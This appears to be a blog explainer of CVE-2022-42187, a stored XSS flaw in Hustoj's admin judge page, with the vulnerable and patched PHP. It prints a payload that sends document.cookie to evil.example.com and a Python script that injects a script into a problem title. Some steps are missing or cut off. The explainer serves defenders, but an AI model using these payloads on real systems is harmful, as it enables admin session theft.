In September 2022, a Cross-Site Scripting (XSS) vulnerability was discovered in Hustoj, a popular open-source Online Judge platform (version 22.09.22). The flaw exists in the /admin/problem_judge.php file, which is supposed to be accessible only by authorized admins. However, a lack of proper output sanitization means an attacker could inject and execute arbitrary JavaScript, putting all admin sessions at risk.
This long read will break down CVE-2022-42187:
1. Cross-Site Scripting (XSS): A Quick Primer
XSS is a web security vulnerability that lets attackers inject client-side scripts (JavaScript, HTML) into pages viewed by others. In admin pages, XSS is especially dangerous since it can steal cookies, tokens, or take over admin accounts.
Read more:
- OWASP XSS Introduction
The Affected File
/admin/problem_judge.php is used by Hustoj admins to manage problem judging options and outputs. Usually, only trusted admins can access this, but XSS vulnerabilities here are still critical because:
The Vulnerable Code
At the time of the bug (v22.09.22), the PHP code did not sanitize outputs when echoing problem attributes:
<?php
// ... some code before
echo "<tr><td>".$row['problem_id']."</td><td>".$row['title']."</td></tr>";
// ... some code after
?>
Here:
title is printed as-is, with no escaping or encoding.
- If the title comes from user input, an attacker can craft a problem name like: <script>alert('XSS')</script>
When the admin loads /admin/problem_judge.php, the script fires with their permissions.
Step-by-Step Attack Scenario
Assumptions:
Admin visits the judge administration page.
Exploit Payload:
Set the problem “title” to
<script>fetch('https://evil.example.com/steal?c='+document.cookie)</script>
How to Reproduce
1. Log in (or exploit any way to add/change a problem’s title).
`html
`
3. Admin visits the judging admin page (/admin/problem_judge.php).
4. The alert pops up, or (if using the fetch payload above) their cookies and data are sent to the attacker.
Minimal PoC Video Link
- YouTube Demo of Similar Hustoj XSS (external)
If you’re scripting this for demonstration in a vuln lab (not for illegal use)
import requests
url = 'http://hustoj.local/admin/problem_edit.php?id=123';
cookies = {'PHPSESSID':'[your-session-here]'}
xss_payload = "<script>alert('CVE-2022-42187')</script>"
data = {
'title': xss_payload,
# other required form data
}
r = requests.post(url, cookies=cookies, data=data)
if r.ok:
print("Payload injected! Visit the admin judge page to trigger.")
4. References and Fixes
- NVD CVE Entry - CVE-2022-42187
- Hustoj GitHub Repository
- Commit Fixing XSS (escaping output using htmlspecialchars)
- XSS in Hustoj - Exploit Details (packetstorm)
Patched Code Example
<?php
echo "<tr><td>".htmlspecialchars($row['problem_id'])."</td><td>".htmlspecialchars($row['title'])."</td></tr>";
?>
5. What Should You Do?
If you use Hustoj 22.09.22 or earlier, update ASAP to a newer release, or at least apply the htmlspecialchars() fix wherever user-input may be printed.
Summary
CVE-2022-42187 in Hustoj 22.09.22 exposes admins to a clear and present XSS threat in /admin/problem_judge.php. The root cause is unescaped output of database fields which can be controlled by attackers. The fix is to use PHP’s htmlspecialchars()—simple but critical. If you run Hustoj for your contests or school, update right away.
Stay secure, and always sanitize output!
*Feel free to share or adapt this post. For questions or further CVE analysis, contact us or open a PR on the Hustoj repo!*
Timeline
Published on: 11/17/2022 04:15:00 UTC
Last modified on: 11/17/2022 23:24:00 UTC